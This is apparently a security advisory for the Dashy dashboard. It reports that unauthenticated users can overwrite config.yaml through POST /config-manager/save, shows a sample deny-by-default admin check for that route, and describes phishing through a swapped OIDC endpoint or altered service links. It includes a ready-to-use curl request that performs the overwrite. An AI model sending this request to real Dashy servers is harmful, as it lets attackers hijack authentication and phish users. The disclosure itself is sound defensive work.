Summary
Users without proper authentication can edit the main config file (config.yaml)
Details
For context, I am running Dashy via docker and using OIDC for authentication:
appConfig:
  language: en
  layout: auto
  iconSize: medium
  theme: glass
  auth:
    enableOidc: true
    oidc:
      clientId: RED
      endpoint: https://RED
      scope: openid profile email
      adminGroup: admin
Any user, whether logged in via OIDC as an admin, not as an admin but still logged in, or not logged in at all, is able to write any changes to the config.
PoC
Config I used on my server:
appConfig:
  language: en
  layout: auto
  iconSize: medium
  theme: glass
  auth:
    enableOidc: true
    oidc:
      clientId: RED
      endpoint: https://RED
      scope: openid profile email
      adminGroup: admin
pageInfo:
  title: Dashboard
  navLinks: []
sections:
  - name: Main
    displayData:
      sortBy: default
      rows: 1
      cols: 1
      collapsed: false
      hideForGuests: false
    items:
      - title: Example Website
        url: https://example.com
        target: newtab
        id: 0_389_example
All you have to do is make a POST request to YOURDOMAIN/config-manager/save
That's it...
In the body, you need to provide the new config file to overwrite the old one with. An example of this with curl (a popular command-line request tool) would be:
curl 'YOURDOMAIN/config-manager/save' \
  -H 'Accept: */*' \
  -H 'Connection: keep-alive' \
  -H 'Content-Type: application/json' \
  --data-raw $'{"config":"appConfig:\\n  language: en\\n  layout: auto\\n  iconSize: medium\\n  theme: glass\\n  auth:\\n    enableOidc: true\\n    oidc:\\n      clientId: RED\\n      endpoint: https://RED\\n      scope: openid profile email\\n      adminGroup: admin\\npageInfo:\\n  title: Dashboard\\n  navLinks: []\\n  \\nsections:\\n  - name: Main\\n    displayData:\\n      sortBy: default\\n      rows: 1\\n      cols: 1\\n      collapsed: false\\n      hideForGuests: false\\n    items:\\n      - title: NOT EXAMPLE\\n        url: https://dashy.to\\n        target: newtab\\n        \\n        id: 0_389_nexample\\n","timestamp":"2026-04-12T20:51:56.770Z","filename":""}'
What that request does is overwrite the entire server's configuration to use OIDC login and the glass theme, with a single section called "Main" containing a single item called "NOT EXAMPLE" which leads to https://dashy.to, which I believe is this repository's website. Anything you put in the request, if it's valid syntax for Dashy's config, will be accepted and written to the server, without any authentication at all.
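As an added example (not Dashy's own code), a deny-by-default authorization guard for the save route: it takes the appConfig.auth block from the config above plus the caller's session, refuses the anonymous and logged-in-but-not-admin cases the advisory describes, and only lets a member of adminGroup write. The session shape ({ sub, groups }), the handler and the sample sessions are assumptions.

```javascript
// Hypothetical hardened guard for POST /config-manager/save (not Dashy's code).
// The OIDC layer is assumed to populate session.sub and session.groups.
const appConfig = { auth: { enableOidc: true, oidc: { adminGroup: 'admin' } } };

function authorizeConfigSave(config, session) {
  const auth = (config && config.auth) || {};
  // Deny by default: with no auth configured there is no admin to trust.
  if (!auth.enableOidc) {
    return { allowed: false, status: 403, reason: 'config writes require OIDC' };
  }
  if (!session || !session.sub) {
    return { allowed: false, status: 401, reason: 'login required' };
  }
  const adminGroup = auth.oidc && auth.oidc.adminGroup;
  const groups = Array.isArray(session.groups) ? session.groups : [];
  if (!adminGroup || !groups.includes(adminGroup)) {
    return { allowed: false, status: 403, reason: 'admin group required' };
  }
  return { allowed: true, status: 200, reason: 'ok' };
}

// Route handler: authorize first, then validate the body, then write.
function handleConfigSave(config, session, body) {
  const decision = authorizeConfigSave(config, session);
  if (!decision.allowed) {
    return { status: decision.status, written: false, reason: decision.reason };
  }
  if (!body || typeof body.config !== 'string' || body.config.trim() === '') {
    return { status: 400, written: false, reason: 'config body required' };
  }
  // A real handler would parse the YAML and write config.yaml here.
  return { status: 200, written: true, bytes: Buffer.byteLength(body.config) };
}

// Constructed sessions for the three caller types the advisory lists.
const sampleSessions = {
  anonymous: null,
  loggedInNotAdmin: { sub: 'alice', groups: ['users'] },
  admin: { sub: 'bob', groups: ['users', 'admin'] },
};

module.exports = { appConfig, authorizeConfigSave, handleConfigSave, sampleSessions };
```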
Impact
An unauthenticated attacker can modify the dashboard configuration, including authentication settings (such as the OIDC provider URL) and service URLs displayed to users.
This allows the attacker to control the authentication flow by redirecting it to an attacker-controlled identity provider, enabling credential phishing and potential account compromise through manipulation of a trusted login process.
Service URLs shown in the dashboard can also be replaced with attacker-controlled links, allowing phishing of internal services by redirecting users to malicious replicas instead of legitimate endpoints.
This results in a loss of trust in both authentication and navigation within the dashboard, and may also impact availability of legitimate services by directing users to invalid or malicious targets.